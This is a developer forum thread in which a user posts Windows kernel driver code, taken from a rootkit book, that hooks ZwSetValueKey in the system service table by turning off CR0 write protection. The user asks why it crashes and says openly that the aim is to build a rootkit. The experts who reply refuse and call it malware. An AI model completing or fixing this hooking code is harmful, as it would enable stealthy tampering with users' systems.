Why when i start my driver the pc crash?

Question

Why when i start my driver the pc crash?

#include "ntddk.h"
#include "datatype.h"
#include "ssdt.h"
//#include "zwsetvaluekey.c"
//#include "hookssdt.c"
//#include "modwp.c"
DWORD getSSDTIndex(BYTE* address)
{
 BYTE* addressOfIndex;
 DWORD indexValue;
 addressOfIndex = address+1;
 indexValue= *((PULONG)addressOfIndex);
return(indexValue);
 }


BYTE* hookSSDT(BYTE* apiCall, BYTE* oldAddr , DWORD* callTable)
{
PLONG target;
DWORD indexValue;
indexValue = getSSDTIndex(apiCall);
target = (PLONG) &(callTable[indexValue]);
return((BYTE*)InterlockedExchange(target,(LONG) oldAddr));
}
NTAPI ZwSetValueKey
(IN HANDLE KeyHandle,
 IN PUNICODE_STRING ValueName,
 IN ULONG TitleIndex OPTIONAL,
 IN ULONG Type,
 IN PVOID Data,
 IN ULONG DataSize
);
typedef NTSTATUS (*ZwSetValueKeyPtr)
(
IN HANDLE KeyHandle,
 IN PUNICODE_STRING ValueName,
 IN ULONG TitleIndex OPTIONAL,
 IN ULONG Type,
 IN PVOID Data,
 IN ULONG DataSize
 );
ZwSetValueKeyPtr oldZwSetValueKey;
NTSTATUS newZwSetValueKey(
IN HANDLE KeyHandle,
 IN PUNICODE_STRING ValueName,
 IN ULONG TitleIndex OPTIONAL,
 IN ULONG Type,
 IN PVOID Data,
 IN ULONG DataSize
)
{
return STATUS_SUCCESS;
}
typedef struct _WP_GLOBALS
{
 BYTE* callTable;
 PMDL pMDL;
}WP_GLOBALS;

WP_GLOBALS disableWP_MDL11
(
DWORD* ssdt,
DWORD nServices
)
{
WP_GLOBALS wpGlobals;
wpGlobals.pMDL = MmCreateMdl
(
NULL,
(PVOID)ssdt,
(SIZE_T)nServices*4
);
MmBuildMdlForNonPagedPool(wpGlobals.pMDL);
(*(wpGlobals.pMDL)).MdlFlags= (*(wpGlobals.pMDL)).MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
wpGlobals.callTable= (BYTE*)MmMapLockedPages(wpGlobals.pMDL, KernelMode);
return(wpGlobals);
}

void disableWP_CR0()
{

__asm
{
PUSH EBX
MOV EBX,CR0
AND EBX,0xFFFEFFFF
MOV CR0, EBX
POP EBX
}
return;
}
void enableWP_CR0()
{
__asm
{
PUSH EBX
MOV EBX,CR0
OR EBX,0x00010000
MOV CR0,EBX
POP EBX
}
return;
}


__declspec(dllimport) SDE KeServiceDescriptorTable;
PMDL pMDL;
PVOID *systemCallTable;

NTSTATUS DriverEntry
(
IN PDRIVER_OBJECT pDriverObject,
IN PUNICODE_STRING theRegistryPath
)
{

WP_GLOBALS wpGlobals = disableWP_MDL11(KeServiceDescriptorTable.KiServiceTable,KeServiceDescriptorTable.nSystemCalls);
pMDL = wpGlobals.pMDL;
systemCallTable = wpGlobals.callTable;
disableWP_CR0();
systemCallTable= (BYTE*)KeServiceDescriptorTable.KiServiceTable;
oldZwSetValueKey = (ZwSetValueKeyPtr)hookSSDT
(
(BYTE*)ZwSetValueKey,
(BYTE*)newZwSetValueKey,
(DWORD*)systemCallTable
);
enableWP_CR0();
return STATUS_SUCCESS;
}

typedef unsigned long DWORD;
typedef unsigned short WORD;
typedef unsigned char BYTE;

#pragma pack(1)
typedef struct ServiceDescriptorEntry
{
 DWORD *KiServiceTable;
 DWORD *CounterBaseTable;
 DWORD nSystemCalls;
 DWORD *KiArgumentTable;
}SDE, *PSDE;
#pragma pack()
typedef struct ServiceDescriptorTable
{
SDE ServiceDescriptor[4];

}SDT;

Answer 1

You do realize that even if you successfully get past this phase you are just going to crash on the hooking.  It is extremely hard to do hooking correctly (all known examples of anything but the most trivial hooks have bugs in them), and you can't do it on 64-bit.

Why are you hooking in the first place, i.e. what problem are you trying to solve?  Hooking just means your driver will be flagged (correctly) as MALWARE.

---

Don Burn Windows Filesystem and Driver Consulting Website: http://www.windrvr.com Blog: http://msmvps.com/blogs/WinDrvr

Answer 2

You do realize that even if you successfully get past this phase you are just going to crash on the hooking.  It is extremely hard to do hooking correctly (all known examples of anything but the most trivial hooks have bugs in them), and you can't do it on 64-bit.

Why are you hooking in the first place, i.e. what problem are you trying to solve?  Hooking just means your driver will be flagged (correctly) as MALWARE.

---

Don Burn Windows Filesystem and Driver Consulting Website: http://www.windrvr.com Blog: http://msmvps.com/blogs/WinDrvr

http://www.amazon.com/The-Rootkit-Arsenal-Evasion-Corners/dp/1598220616

This explains everything.I want to do the ssdt hooking example from the book.

And why it crash?

• Reply 
• Quote 
• Mark As Answer 
• Edit 
• Delete

Answer 3

Yes the books code was crap when it was published, and since then it has gotten worse as things have changed.  Why do you believe hooking will help you in anyway?

---

Don Burn Windows Filesystem and Driver Consulting Website: http://www.windrvr.com Blog: http://msmvps.com/blogs/WinDrvr

Answer 4

And then how to take over the machine?

Answer 5

you don't. that is exactly the point, it shouldn't be done. what problem are you trying to solve ? there are probably much better ways to do it.

---

d -- This posting is provided "AS IS" with no warranties, and confers no rights.

Answer 6

I want to make a rootkit.Is the filter driver a good idea?

Answer 7

So you are publicly asking how to create illegal malicious software?  And you expect us to help?

---

Don Burn Windows Filesystem and Driver Consulting Website: http://www.windrvr.com Blog: http://msmvps.com/blogs/WinDrvr

Answer 8

Yes and yes.Since i have found the book "The rootkit arsenal" i want to create my own rootkit.

Answer 9

It is outdated. Read on hypervisors and things like Active Management (AMT). And this.

-- pa